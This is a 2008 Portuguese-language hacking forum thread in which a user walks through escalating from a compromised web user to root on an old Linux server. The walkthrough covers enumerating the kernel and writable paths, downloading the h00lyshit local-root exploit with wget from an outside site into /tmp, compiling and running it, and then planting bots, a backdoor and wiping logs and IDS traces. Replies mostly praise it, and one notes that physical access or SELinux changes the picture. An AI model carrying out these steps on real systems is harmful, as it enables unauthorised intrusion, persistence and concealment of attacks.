Pegando acesso ao Root

Iniciado por C00L3R, 09 de Dezembro , 2008, 05:48:46 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

C00L3R

bem a forma mais simples de pegar acesso ao usuário root
seria usar um XPL(exploit local) se com um exploit você obteve
acesso a um "user" o segundo passo seria pegar o Root pelo menos
na cabeça do cracker...

vamos pegar um exemplo:
1-usamos o exploit "Censtore.cgi exploit" para explorar um determinado server
http://www.milw0rm.com/exploits/1669

2-exploramos a falha num server vulnerável nos temos acesso a um "user" padrão exemplo
$ wellcome to debian
adminweb-$ uname -a           <--analisando a versão do kernel
host.com.br bla bla 2.6.8 Linux kernel
adminweb-$ find / -perm -2 -ls          <--comando para ver arquivos com permissão de escrita
/tmp/
/dev/bla bla ;....................
adminweb-$ cd /tmp               <-- inves de procurar arquivos com permissões resolvi ir na pasta "/tmp" ou seja temporários
la temos permissão para usar  executar arquivos dar wget depende muito do server em alguns tera que usar ftp ou curl...

3-Aqui a parte mais chata achar o XPL para versão do kernel bem como o kernel achado é antigo vamos usar o h00lyshit,a todo momento sai XPL para sistemas embora alguns sistemas demorem mais para sair como OpenBSD e NetBSD isso vai muito do Programador que faz XPLs geralmente eles fazem par aos sistemas mais populares "Linux e freebsd" não é atoa que se você tem um servidor com linux você em que compilar o um novo kernel direto para ver as melhorias e arrumar as vulnerabilidades...

do sistema ,bem continuando..
adminweb-$ wget http://www.arblan.com/localroot/h00lyshit.c   <--baixar o xpl do site desejado
download bla bla
adminweb-$ gcc h00lyshit.c -o h00lyshit   <-- compilamos o exploit
bla bla make.. bla bal
/ .. // as/.d./ ././ bla bla
adminweb-$

4-terminado isso temos que executar o XPL porem o h00lyshit como muitos XPL precisão de um arquivo grande para bugar e causar um crash no kernel exemplo "./h00lyshit arquivo_grande_do_disco" feito isso se tudo dar certo teremos acesso ao root,mas vamos gerar um arquivo grande no sistema com o comando "dd if=/dev/urandom of=grande count=2M" vai demorar de 2 a 5minutos se o comando falhar tente dd "if=/dev/zero of=/tmp/grande count=102400 bs=1024" feito isso vamos executar nosso XPL

adminweb-$./h00lyshit grande
root-# whoami  <-- verificandose somos root
root
root-#

pronto funciono o XPL estamos como root,um Cracker depois disso da upload em seus Bots,deixa um OpenSSH ou um Backdoor e queima os Logs do sistema e possíveis ids(snort etc..)

Bem acho com este artigo vai ajudar muitos a entender como funciona XPLs
BY C00L3R

quer se sentir seguro Use OpenBSD no seu servidor ;)



KEst

Pena que não tenho lugar pra testar.
Mesmo assim valeu, c00l3r.

Campanha Converta-se a Gnu is Not Unix/Linux

kohx


Reeves

Otimo tópico

vlw a colaboração C00L3R

vc é bem vindo no darkers kra...



Hug's
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

C00L3R

salve qualquer coisa estou com pessoal geek do BotecoUnix
quando porde rposto algo aqui

timmerman

Honestamente, acredito que a forma mais simples seria com acesso físico ao equipamento, substituindo o init pelo bash, remontando a raiz em modo read/write e alterando a senha de root com o comando passwd...

Com o XPL seria mais interessante somente se o atacante possuir acesso lógico ao equipamento (mas não físico), pois se o SElinux estiver habilitado ou não estiver utilizando um kernel tão velho (de 2004) como o que foi aqui exposto, o exploit não funcionará.

douglasgyn

Como sempre dedos afiados em Timm ????
ótima observação, não tinha pençado na versão do kernel....
valeu a boa itenção do Xploit, mais dificilmente vai funcionar !!!!
.
flw